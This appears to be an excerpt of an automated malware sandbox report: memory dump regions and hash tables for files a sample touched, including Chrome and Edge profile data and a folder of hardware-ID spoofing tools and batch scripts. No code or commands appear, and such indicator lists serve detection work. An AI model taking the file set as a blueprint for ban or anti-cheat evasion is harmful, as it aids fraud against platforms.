| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3652-1807-0x00007FFC903A0000-0x00007FFC90988000-memory.dmp
memory/3652-1820-0x00007FFC9DCB0000-0x00007FFC9DCD6000-memory.dmp
memory/3652-1832-0x00007FFC897E0000-0x00007FFC89855000-memory.dmp
memory/3652-1830-0x00007FFC8FE20000-0x00007FFC8FE31000-memory.dmp
memory/3652-1829-0x00007FFC90F00000-0x00007FFC90F4D000-memory.dmp
memory/3652-1828-0x00007FFC90F50000-0x00007FFC90F69000-memory.dmp
memory/3652-1827-0x00007FFC90F70000-0x00007FFC90F87000-memory.dmp
memory/3652-1826-0x00007FFC911C0000-0x00007FFC911E2000-memory.dmp
memory/3652-1825-0x00007FFC911F0000-0x00007FFC91204000-memory.dmp
memory/3652-1821-0x00007FFC8FE40000-0x00007FFC8FF5C000-memory.dmp
memory/3652-1823-0x00007FFC96C60000-0x00007FFC96C75000-memory.dmp
memory/3652-1822-0x00007FFC96C80000-0x00007FFC96CB8000-memory.dmp
memory/3652-1817-0x00007FFC8FF60000-0x00007FFC90018000-memory.dmp
memory/3652-1818-0x00007FFCA4A80000-0x00007FFCA4A8D000-memory.dmp
memory/3652-1816-0x00007FFC9E5A0000-0x00007FFC9E5CE000-memory.dmp
memory/3652-1813-0x00007FFC90020000-0x00007FFC90395000-memory.dmp
memory/3652-1824-0x00007FFC96C40000-0x00007FFC96C52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI47562\cryptography-42.0.8.dist-info\INSTALLER
| MD5 | 365c9bfeb7d89244f2ce01c1de44cb85 |
| SHA1 | d7a03141d5d6b1e88b6b59ef08b6681df212c599 |
| SHA256 | ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508 |
| SHA512 | d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1 |
memory/5348-4386-0x00007FFC96C60000-0x00007FFC96C72000-memory.dmp
memory/5348-4384-0x00007FFC9B8F0000-0x00007FFC9B8FC000-memory.dmp
memory/5348-4357-0x00007FFCA27F0000-0x00007FFCA2804000-memory.dmp
memory/5348-4356-0x00007FFC9F270000-0x00007FFC9F29D000-memory.dmp
memory/5348-4355-0x00007FFCA49A0000-0x00007FFCA49B9000-memory.dmp
memory/5348-4354-0x00007FFCA4E20000-0x00007FFCA4E2F000-memory.dmp
memory/5348-4353-0x00007FFC9F3C0000-0x00007FFC9F3E4000-memory.dmp
memory/5348-4358-0x00007FFC90020000-0x00007FFC90395000-memory.dmp
memory/5348-4365-0x00007FFC9DCB0000-0x00007FFC9DCD6000-memory.dmp
memory/5348-4364-0x00007FFCA29B0000-0x00007FFCA29BB000-memory.dmp
memory/5348-4363-0x00007FFCA4A80000-0x00007FFCA4A8D000-memory.dmp
memory/5348-4362-0x00007FFC8FF60000-0x00007FFC90018000-memory.dmp
memory/5348-4389-0x00007FFC911C0000-0x00007FFC911D7000-memory.dmp
memory/5348-4388-0x00007FFC911E0000-0x00007FFC91202000-memory.dmp
memory/5348-4387-0x00007FFC96C40000-0x00007FFC96C54000-memory.dmp
memory/5348-4385-0x00007FFC9B330000-0x00007FFC9B345000-memory.dmp
memory/5348-4366-0x00007FFC8FE40000-0x00007FFC8FF5C000-memory.dmp
memory/5348-4383-0x00007FFC9B900000-0x00007FFC9B912000-memory.dmp
memory/5348-4382-0x00007FFC9E580000-0x00007FFC9E58D000-memory.dmp
memory/5348-4381-0x00007FFC9E590000-0x00007FFC9E59C000-memory.dmp
memory/5348-4380-0x00007FFC9F250000-0x00007FFC9F25C000-memory.dmp
memory/5348-4379-0x00007FFC9F260000-0x00007FFC9F26B000-memory.dmp
memory/5348-4378-0x00007FFC9F560000-0x00007FFC9F56B000-memory.dmp
memory/5348-4377-0x00007FFC9FA00000-0x00007FFC9FA0C000-memory.dmp
memory/5348-4376-0x00007FFC9FA10000-0x00007FFC9FA1E000-memory.dmp
memory/5348-4375-0x00007FFC9FB50000-0x00007FFC9FB5C000-memory.dmp
memory/5348-4374-0x00007FFC9FB60000-0x00007FFC9FB6C000-memory.dmp
memory/5348-4373-0x00007FFC9FD70000-0x00007FFC9FD7B000-memory.dmp
memory/5348-4372-0x00007FFC9FD80000-0x00007FFC9FD8C000-memory.dmp
memory/5348-4371-0x00007FFCA08E0000-0x00007FFCA08EB000-memory.dmp
memory/5348-4370-0x00007FFCA1F80000-0x00007FFCA1F8C000-memory.dmp
memory/5348-4369-0x00007FFCA2160000-0x00007FFCA216B000-memory.dmp
memory/5348-4367-0x00007FFC96C80000-0x00007FFC96CB8000-memory.dmp
memory/5348-4361-0x00007FFC9E5A0000-0x00007FFC9E5CE000-memory.dmp
memory/5348-4360-0x00007FFCA4CB0000-0x00007FFCA4CBD000-memory.dmp
memory/5348-4359-0x00007FFC9FFA0000-0x00007FFC9FFB9000-memory.dmp
memory/5348-4352-0x00007FFC903A0000-0x00007FFC90988000-memory.dmp
memory/5348-4368-0x00007FFCA28F0000-0x00007FFCA28FB000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 744dabba01eb3c0bb19e669e73596d7d |
| SHA1 | 728d7d8155c481c3aaf0bcdfaae3168aa7d02470 |
| SHA256 | 5cd29a0f430da0b60db968421c5af34c283c2b46fe50504390ea9b0ed6d1174c |
| SHA512 | dda6bc32b671bc98651aa99f6b047789b0cef3b1586ce98ae46a99b9211e0b0305e898db354f495e63e4faf66059cd094d32ed2ee073702b8129e15bacb3fc30 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000024
| MD5 | 151fb811968eaf8efb840908b89dc9d4 |
| SHA1 | 7ec811009fd9b0e6d92d12d78b002275f2f1bee1 |
| SHA256 | 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed |
| SHA512 | 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | cb082f1596b8692c6f8c27b43efa824a |
| SHA1 | 4640e7517ec550f8fd7f33496eb80f9695820f50 |
| SHA256 | e1ea2b9e0b4a47937d424c88e22b456bf095df389382d5fe1c3fb205f7c5565d |
| SHA512 | 967620c118dbe6cd9bd555db5a8c3e759366accb39b77918345be2a192ce1df8a4a0a464f9e47f09e3a98f83d08cfeea2c474124513d9c078f7418274e5d0d78 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5817f3f947b8853345e5fd156a3f0e5c |
| SHA1 | 565d8871d8ba0608e33d2defa89b84fd91f8173e |
| SHA256 | d14ea28597fa05aa1e0dc478cda93889031e2be414ce74c712a30b236fb9e250 |
| SHA512 | 8d2f104dd7b18ec877333aa96db42bd0c9da57d26658933a836ebedfb0b7d18be18e453037210a0a1a4f092bdec6285dfc8adda23b299371e3bbbe8afd7f8a7f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\3a9dcb0f-1bd4-4bcb-8923-d7553a8fa0c9.tmp
| MD5 | 0a7742d0fe9ed10bab2297bd5d1a788e |
| SHA1 | cd818be70ce70d4d35d0e901c371334a2c952cd4 |
| SHA256 | 91b0c6c434758f4d890728b0327dfdd0a05ab0fc377929f4e55d438182696164 |
| SHA512 | 06e53d9f4186a90d720ee38982689dd5e84b8abb523c914f49c8de5d371dc0b994de6136895718a76bdcae30458835d7fa6913bfb3968aca7e77b106087935d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6ae84fc1e66cbbb7e9d28b0e12d64550 |
| SHA1 | 100430bb653c896c11b94ac0bf2297a389ea5ad8 |
| SHA256 | 856a9c0ac8c29f738a3501b6bd007fd8cbbac211e461b91f4caff52dd41da75c |
| SHA512 | 7fe7a8639d96118b843e67a6a6d397271b181dc6b049e6f7de77bee9c9214690b1b7f73164f7e463e117406dc978334ea02397fd639140598f60f89c6aaddbe8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\12e70412-6fcc-4056-90c2-bb834d0a4c9a.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 97f8be9c465b0ed67c2415868506c354 |
| SHA1 | cdb221d6debcf55615d3b5f30796e32065046dd9 |
| SHA256 | b606a1ee10b65eb9077e7d2f3b34a0d7a1ed6a4802a169fe55449c975332ee02 |
| SHA512 | a0fe0ed30624658127316873137f4fc488a5916005e5e3f1f55b7d6442b54010c08d7037b94d0cf3c3316b1bb4acf91bad9e64ee6d15302e3cdd62bb18730542 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\d24d6b52-2425-4bf2-8b5d-dd34cd55a658.tmp
| MD5 | dfe329a06e09e3d864cb3002e7a4401c |
| SHA1 | 67a1dd0fcd0c5e3466915ffa3b2a7080012ba5e5 |
| SHA256 | e2a3e384bda5577b8a65a2c7d6f8f06bc635e17656fa035e70c28ace7aa8e6c6 |
| SHA512 | 51b651931a39597c875fc1383f7831b4f2a57f0e3c81d1182b8e7adfe9a0e3c1440c6ad431208849cafa0c44590e548df5c29fe27b89104ceaa271d819027dc4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | c727d77f4c4d449eb2f09ec7cee7a628 |
| SHA1 | 59dde03552aeb1983c471520980698a008092ec4 |
| SHA256 | a0fd6587702c97c151d0c8f593025fd53b45e89487a553b953e012a9ee3a079e |
| SHA512 | 45292a0a811d087bd1c9fda21283f67ee570901d6f73e8286528fccc19128442a596dcfbdfb85c0fb42f4719cc9966025997aa77fdde57210ffcc584354b88e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5d0790cbc6ca6f23cecaa6aa724cb64c |
| SHA1 | 5aeb50671a1a921ffcdaf0fad1f36625a32bae69 |
| SHA256 | e5ba25153a8d6461811967f4373a705698c9c10a05fecda74fad66b6be5252d1 |
| SHA512 | 0a85bd93e337680cbae88b166f7453c5afc7ec808d7b8ef2c97bfe56667b76f5eb947951eaeb6f90a8e5cff08b44ef8e4b628590792b04efc9c689e544ea34bc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 610bbfe243097ef1b5a0aa546092c2bb |
| SHA1 | 61b3109cb4c892e1b5a11830df37ccf392d3c39f |
| SHA256 | e76ca15122534aed1738617f5a637b61a89d3012ecd03b096c00285c33e97cc3 |
| SHA512 | 79253002c898908f598218b90ab456e74faecf2015f4c3bbb8ba85e3c8f4656eabebc3d8a442fcb9740095dbb2df2740e6208bcea8c708e99ec07da580eaaf83 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | dec85455762ca6b947c9ac5be18bfd62 |
| SHA1 | 22867503db9710743ba742204ebdd32276d5e388 |
| SHA256 | f8d910a1b18527a58c6209f8218d6a0d516d9e45a12b1dee0f6f92d57a0e9d6a |
| SHA512 | 1f1dd0ee8ddc70894d6ae9c2fb235533172175278032da25b1ff0ef371d4d46b66089232a2a55c838a7acac241294bbd2e19a574438967929a8041158d99a57a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | be706251ea0d4bb0ce5b786d47626780 |
| SHA1 | 137aba1b819ac01884915205e4706a978ba61046 |
| SHA256 | ee6dbab02a8affca4926dcdbb65576273e88d5408954d469d3cf66d73067615e |
| SHA512 | 633fbd8f55e43fccc1b271da7194a639e825ee01a214054deb714e752ad8f40f1a162b5c93435677191f92def60ceec6c461efd6104d5101c7bb9aac06a3d14b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 72d45256436109e6a74212a5dfaa3493 |
| SHA1 | 191803fe508cfcb6127461dc54691e208b0248b6 |
| SHA256 | f5d4d58ee0e0ffd22ab3640c561cd65430445426d9f536795a1b1e0aa62319f7 |
| SHA512 | 219edc8699a7a03f33674ca83ec512b068b202e77937c1bd84226814ebbb09733144d5727a8523769ffc566f266d4bf59ec8d8fd33b98b3362a0dfd8d949c051 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | efe7f75b445e2a090c14d7ed98b9cbe5 |
| SHA1 | 7064591dd099e37ae23887708e569515169eda79 |
| SHA256 | 0f38aea80372182867ecc3f28ac9b79f0a36f3ede8dba13a6dbabd4b116c95e4 |
| SHA512 | 2caab0dbc3d7c5d4caaeffb15e3757a7d478fa8325b98fc3f440c0bf4a31b52435ea5e91367473dc12f695acc32792e527bb95ac143fc594bebe1c3e944c57b9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6e8168380bc5d421fa65efa049a2cd40 |
| SHA1 | f4f6727f49a0b33053b0cf28c71770f024a0e8f6 |
| SHA256 | 0c47b464686619fb25a897054da858bf64b9894917e27f13a8cb63b277700c23 |
| SHA512 | 965d0b504a68666f97c9a287dc1bf7f98d970eb5d09da8620fdbe9fa86d2300561679ebbbc0287c3b627147b708e2f447f1762d40a488f58cdd77887d3385c92 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9605c7fae0cd6bb3f1b3b110b90c6039 |
| SHA1 | 5ed209cb489db3fc8933873a2642ab591901e6d9 |
| SHA256 | 291247132b7ad13f152ca9e1976d8cf7d0e2da68a7f920f68bba83ffeb54f82e |
| SHA512 | a66475ac3a1af154d5497ef845232b117858f7fb5912dc25283f4b8f4348b5f7a0c4e55ceb7bbc5d1e7d2076b7600676f939bcd141e21f1bad1b8ebf2f518333 |
C:\Users\Admin\Downloads\Unconfirmed 586836.crdownload
| MD5 | 27f87ebebb071afec1891e00fd0700a4 |
| SHA1 | fbfc0a10ecf83da88df02356568bcac2399b3b9d |
| SHA256 | 11b8cdd387370de1d162516b82376ecf28d321dc8f46ebcce389dccc2a5a4cc9 |
| SHA512 | 5386cae4eef9b767082d1143962851727479295b75321e07927bf7ebd60c5e051aeb78d6fa306ed6ef1c1d0182a16f1132a23263aefe9ed5d9d446b70b43a25d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c768dd3ba45184fd44b326dc357f4b75 |
| SHA1 | 2c3968976fd6246da70fc0eadd4bfcc28c8f056d |
| SHA256 | ecf821e583e0a9825acf6029a70473de53f85ef7ee76c4050c1831eabeba7ec7 |
| SHA512 | 68ae530a227e6b71d42dc5e1ee1d5f95a2ebef3602cef1d8ea28e21cad94bc2f0d2ab717c6a48b223293e67bbc06111d80ed95a695e3647745bb54993911e989 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6d60b96cf7b363536ab6f24b3f1a9aa2 |
| SHA1 | 7e7abef3a759a06c276379fa05bac9e0552e5a07 |
| SHA256 | de910797e7a9024031de5f6b2515b1813af1caf2021d831234d8c888f15303c0 |
| SHA512 | 54376d46149946d1beda0b73963161ceb946018d27b1482251a3119be3fdf26e0e9dc95f93a9a7f6c639955b68f41a5cc29dda65b1be56a29cfb66fc10c659e7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d8e524b1cf29e9f4452c83246925063e |
| SHA1 | 48973079abcf3b623b7f26a55f13c7a4bff98e5a |
| SHA256 | 4fa27c60f4dfd30c8d33b9c2c3b948bcfe4e2e7b43e669a0667df38adb4d8a55 |
| SHA512 | 06d2f7476205ba6e861bd6abaaf3deef21e707e026e55deee0b8e38431fdd04cc916dcc68d0c2bba8c1721f3c194652cc05d1a841d9a422218addba9a8a727b4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ef6d71cb52518613084e72d56e7c936f |
| SHA1 | 04b03f4dccd3f6667f1c95a0816c33a46a9c0eff |
| SHA256 | dd2544fc158fb72760d06020c6221276af2e040d862601fe923ae913ec807d4e |
| SHA512 | 0eb2e97e73c6d47f80e204912fda141248ba3496f7024a43ce512d79936ebea76fb52400a5f8a53b30ec4f6dfae7fa7d39c77752d9b61ebe0cbccd5282832416 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d8208c6c9e7987b4893eba28658a0c48 |
| SHA1 | f6ab32dc4a20f1e4593805ad445ff181b3d8c372 |
| SHA256 | ba4bef01c7ebccd92dd9b232d5156cc48fc99e7f8102a29fed36be302c368513 |
| SHA512 | 40583fcc1cb5c50d3dde24f0ce266332ef0e21cac814f969b82aa2e1f7906d4ac205f0436e78c3a10673e56c65f8b50f1defc096b234946f6592a7b37210c477 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe59ace0.TMP
| MD5 | 88341b715aa638fbb8fd2aa0f209c714 |
| SHA1 | 03740c0de7080c2aa19a286288d134f30a72a1ee |
| SHA256 | b3e760d4f9f5be435e81dd282bd634a052077e2e39a952841e6ba78a35c06ffc |
| SHA512 | 654fa5d468d9566771943bb07da7dd0a8bf142e5e870ee3e636e9d79dde0add5e69e91871c2a35bc1c104e51788c86c7055b0ddee6af3cda09aac700da2da90c |
C:\Users\Admin\Desktop\New folder\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_F24AE254AC712022CD7275ECC89876F9
| MD5 | ec37a4916fb6896423446ef9eba73ef6 |
| SHA1 | 13d403b3cc2de4b5dc160d47b9815f42dcb7f6da |
| SHA256 | 315365f907e34de7d78886aff7425eabafaf27c7784ac020dde7aad00b722bc6 |
| SHA512 | 15482a132c0bc0fd1ea12c8967b33c19bfda90c730ec0f69fccda267ec2119be7cd30d530425557fa613cb0eab7f1c05d39e9a0cedeaff6c2e81b8b1840af0cd |
C:\Users\Admin\Desktop\New folder\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_F24AE254AC712022CD7275ECC89876F9
| MD5 | e4f4e43f6b54201d53f1ba96c213d0f6 |
| SHA1 | caccc65d8d92dd996a99e03a19fdd83054e99538 |
| SHA256 | 1b66353a20df727a507ee08c6b855b0f88cf19f9f5383f8270c4a23e351159bd |
| SHA512 | 3b6b70459fe6c2c4936f4ac3b681c47acc72f7ab0233d8a17d5fbdc24a8587d192b51a9d6177fe7cbaf585963da784391f8b8f7f782013f3841147d1b7739f1a |
C:\Users\Admin\Desktop\New folder\AMIDEWINx64.EXE
| MD5 | 9f809d4cbc9c9c1eed61990c95ce1fb4 |
| SHA1 | 2106ab46c69bb306737408489608cf50e8d845d4 |
| SHA256 | 19eac53d1673835e9488089da9d83014ea5441c7fdfb0fe5d2ae51dec9b853e6 |
| SHA512 | 8202d4cd4b1d89a8add9d9813aa0a2b59e25bf9c9f7f449f9f07c2f2d7120c603840ce33c6d98e061e1d1de1cf028dd6630d38b324494ccfc8225dee2f30f998 |
C:\Users\Admin\Desktop\New folder\AMIFLDRV64.SYS
| MD5 | 6d368bb9292be51df60bd546e3b6391e |
| SHA1 | 6b21984302ddfc53be6dbe4bf1521600b5b1dc0f |
| SHA256 | 4998183a00281f1a43bcb84ddb0eacb415e63e95e906a2117e9637b9b421c686 |
| SHA512 | d38b6f284ec149e9b60d6f961112daf25bd9d2bcc75313e1198fec5622dfe5540b78f1b2c4bd7935fc8e8305df66f7008660644a31d2433fa431ab9a6a4ba03c |
C:\Windows\backgroundcleaner.bat
| MD5 | 5bbb7b1edb71e661fab202d6d792e4b8 |
| SHA1 | bc84f331aa09d0934962e76ef7fd8b5a4df01b0c |
| SHA256 | 4d184dc063ec829cb6e265d62eb3d78327df1b09838760cdd8213c5985b95b7f |
| SHA512 | b1b468cef84e9d1c4532828dbbf28babbc1b3f214d93241e951f0bdfaf09b39a3a8a5bd4092ca6c12ad8fa00f992e7b7b52a679ec9e403d16e75af32c80f3299 |
C:\Users\Admin\Desktop\New folder\devcon.exe
| MD5 | 297d9fec2a6a61f4865ae4a929d9cc18 |
| SHA1 | f4aea2b8334234b078696c1fc926553c1c3d06c4 |
| SHA256 | 9f19ed71bea36c07d2c11e7adc50ee926c98e039bf10ac4c818f2a6d29a5829d |
| SHA512 | 4ed79f46a0d0aa236fd9b1f0676ac27ed8cf762013ce0343350f829b41df1bf53760bc81b9dfdb41fb02b48ef1efa0263004f4be782ce143babc2fc1b5fc82b4 |
C:\Users\Admin\Desktop\New folder\DeviceCleanupCmd.exe
| MD5 | 8d89ae106ee5b8a105c00d33daeb3b7d |
| SHA1 | beece29dd016eb7c2739cb4351777174c4d4a476 |
| SHA256 | 2fe88e984c23cf5fcb38121674fdb0c890e303be24e9badcc681d5b3aaf8341c |
| SHA512 | 270bdf43c599cc8a7eb00410be56251f2e176876b138fdfdb12ef56c347249de31aa1b90c6357eeea6d9d291927399bcc2fe37345f978cb71bdfb6f0083073ab |
C:\Users\Admin\Desktop\New folder\DevManView.exe
| MD5 | fba90638bf0e0d5adc129702389077ae |
| SHA1 | b64bac6f2f7ce214dff3739f65ea763b34e5216b |
| SHA256 | f17785dc0242c332285023e4882c8379a23f90aa8af3bcf4f739b6432746d9f9 |
| SHA512 | 8c0e33f01e485267fc4f14443ed668ec64363af482cd3e5d088e332df5f5bbdd1c82811f53951787bb78cc20e98e66fd9a4f08bc5bab08528a19953e66c57950 |
C:\Users\Admin\Desktop\New folder\DriveCleanup.exe
| MD5 | 7394017e16624184b3b62f68fbf4d578 |
| SHA1 | 0ebf6abe9e1db343c09417714392ae8d33611803 |
| SHA256 | dd84902057331f31740ccb2c0641d5b035c00d26523df7b8eab2ff4c6ecf3f33 |
| SHA512 | f516dcd17d10e1a2472dff77613ea7381e947caf75109ecc9e437b91cc447ffe40f8101595411b8df05fd7b1909a2247546b1efce345e0daff8f7b541aaba9b2 |
C:\Users\Admin\Desktop\New folder\gen.py
| MD5 | ad460b2fb2e78f05aabe81ac35cf4bbc |
| SHA1 | 8d25fbaf5cc402a4a16240c2d1004b8e902ca7ee |
| SHA256 | c26351c30adfa116ce1c5123a957b75c12e37e7ded449dde225f065ceb10af39 |
| SHA512 | 0d711ebeeb764fce17db2c7aac58c49586a1b4a22758cdd50724c49f76227b6491649a86c4ae66776a2b6e93dae36c37ddfc4a288aa8f84b1482eed796f45447 |
C:\Users\Admin\Desktop\New folder\kreyzecleaner.exe
| MD5 | 78b31c839d6a9d83de25dd7098fb386d |
| SHA1 | c1d3b34e6b6c794f9e8fc05f9ddbcc9a379f6a2c |
| SHA256 | 3348b85e7ef4db850ec66a3dfbc035464a4151e8eb8084ab471266f1862245e7 |
| SHA512 | 9de756bc39c7f3c0f2295264e4b294020290863d87466fb7e18030245def0190490f15c7177c2ae6d87edde0fb5d07c242dc706aa4a81da7945a4d6881e227f8 |
C:\Users\Admin\Desktop\New folder\python310._pth
| MD5 | 83d61f55cd1ac27ca76203292df45186 |
| SHA1 | a4e097bc7a0876fab9421927f48d154a8a9f0762 |
| SHA256 | 08cc5dd49edb5d7d5763460f5d09f05fb19dc1bae12ec8d88ad48b651e593922 |
| SHA512 | ab3138e49c43c332b27625414a3519c93fbc315738a94eed588e5c2fdbbb1993a90f0e45ce98bd24b00fe1499843cb3aa6530f78870e0a250f2d81d6b27c3988 |
C:\Users\Admin\Desktop\New folder\segwindrv.cat
| MD5 | 43d3603cf918445cbd1d7253b49bf527 |
| SHA1 | fabfaee55f2c4e6ca508d735b297bdb738ab1c7d |
| SHA256 | e830efe7786b0fb9dd84eb647614fa1795ec5caa605d44d9a13f0fdbd0f4d6b5 |
| SHA512 | 183b8498e4c86966050be324a027fc0a7f8179bb77d032ec97cf64ab91dac72c8e7fcdda36c733c2815973b72c91cee19d3263376a7e3b955c616f548690186e |
C:\Users\Admin\Desktop\New folder\segwindrvx64.sys
| MD5 | 525c631fab5952316170021f91371c3e |
| SHA1 | c3b880819f9c71b4d5f9bb232778f14a4ec334aa |
| SHA256 | 9ef426e2a826cd4096f5112819d375be3fb1e8a82731be69315cdf8120fd1a8b |
| SHA512 | ea2f9ef2a45ce32fed064c828dd7d229bbbab71533f42a05689ab46cc953c8a004ff86dafb4d0958ce37d1b586221c82e1e1a546a18e27964318e359f86a14e4 |
C:\Users\Admin\Desktop\New folder\serials.bat
| MD5 | e823fb391ad153984606c9858fab7969 |
| SHA1 | fe33b0b70410117d16832785fb418b711c9c51bf |
| SHA256 | 91ec12ca0dc6c4664d359ecde6eba272df2c6e776eddb387c3b6a2a6ab397612 |
| SHA512 | eec958085c2470056ad2be4e7b67638d0d04c9fe468c72c29ee2950d92dc9c6e282fd4e93f62d74d24e412227a537111391ba0fcec81e269526672215c70b255 |
C:\Users\Admin\Desktop\New folder\sidchg64-3.0h.exe
| MD5 | 155e687c1f83e375410b8b0ca6f4d7ad |
| SHA1 | 8c13b3cd033a8c1bbf319240781e2f5fa85b7ced |
| SHA256 | 484bd0249dd53100a4123360e3f5065436d67f709c0e3061cd9512cb6728b0c8 |
| SHA512 | 300d3ab97d3ec1ec59127c434a34a0d2af97fb2b1081a496da3f90d51556cd89303d5a670eaef90e04252a16a6d046ae3ebe204406b7d102e1d9c8e20c4a5509 |
C:\Users\Admin\Desktop\New folder\Spoofer.bat
| MD5 | d989e849b9565dc23442fe772eb72d1e |
| SHA1 | 02117e23d373ac8481c7f33422444f73bfe22809 |
| SHA256 | c2dc77692c537f33776a3169e13454061f2b98e1e6f7466f8c952371a8ff96c5 |
| SHA512 | 7cb638aa2fdb15aee186ce8e9c8ce89f6dfc9b236ade7cf282e5fbb4ec07ef336b61609ea46059a2de7e183d129191bbc40b382fd610dddffc7cbb045feb6b56 |
C:\Users\Admin\Desktop\New folder\Taskkill_clean.bat
| MD5 | 6393a0289b9433f86d7662aed91d5530 |
| SHA1 | 71ccdaa7bc095221413dbe0ecdf6b91cee266f9c |
| SHA256 | acfdb643c84ba2c9f95eb5e19690f3167a435b6500ca7d1abfc31b69a292e468 |
| SHA512 | f657c7dd117100b223d79f644e0dc19ead310bfb17cc7bbde218029792df3013a041c1aaaa82e20b51b5afcdee3db05a0925cd819d991f3872263f24b5065569 |
C:\Users\Admin\Desktop\New folder\Volumeid64.exe
| MD5 | 6bfc242df50221401fd2417d0daf3a97 |
| SHA1 | 75f1a628f8c5fcda07bd2a948b1d7f4fa1261034 |
| SHA256 | c1bd4da8617360bca6b414a6efc719a413a1566c2ce83178fa4a35e9f00b9b42 |
| SHA512 | bf26f8354f4b2f6956ccdad270fef41bb103a51994506e895392c3fe00c8a167939466d8febe5176f631a3fe623e6023c94e124057985493d62a409697e3ff7f |
C:\Users\Admin\Desktop\New folder\CrashpadMetrics-active.pma
| MD5 | 3116632b5cce5c8477c694b708a9d8b6 |
| SHA1 | 1711664c9680416067b96dedbd344b057b88f4aa |
| SHA256 | b4335dbc7e97d271093ec652708e865214b03d1115628cea8255e5d13be14350 |
| SHA512 | d124de1b88e858d01cdd4c6c432f417cfbe67716183581b28be3ccdc60b67e09deb0268453e79931184df17cb491238a1b3fe43f71892515320d972a48d1851d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 35dc08ce491442ad7f667f90e12b97dc |
| SHA1 | 9778fadf1844bb76c8229aa6df7aed3b0fa0ea1b |
| SHA256 | 147f225a948cc76ed6a07bcd24aa29787bad5ff9fbe678e49588cdf9a8c5cd0c |
| SHA512 | 90b93c3536bdc06bc233af772e4175c84f26ad25c5df88fe08c3cbb0aaca373a9231771d8125f2e2857ed4dbf38dd28d2d7ddd89647a1cbb0c8ec9dda09f0452 |
C:\Users\Admin\Desktop\New folder\BrowserMetrics-668C2124-1988.pma
| MD5 | 260bab80f1e13e67e3186a0816037c44 |
| SHA1 | 356f340907f43c94cd37661e726a79b6240d5c70 |
| SHA256 | 73816bde57dfc7ef69b9f838ae3131865b2a214d7f657bdb931fe7138971c52d |
| SHA512 | 3f4885d1d6b162ebc818e847e4853077dfe19087a8124f4efbb2d86bd96040d2ce32fd02b78b443ca759a29dfb83ff4df49926efcf7640a69fc307247d87d82f |
C:\Users\Admin\Desktop\New folder\LOG
| MD5 | e00bcce9ea7dccd51dd7afa5123a7086 |
| SHA1 | f52ae812dc36a4dd2c1d3abcf4140a1841fdc0fc |
| SHA256 | e0b403dcd5c66302df40655ded35bbee69cd70e0fc565be45f1f2e3b59b3ad46 |
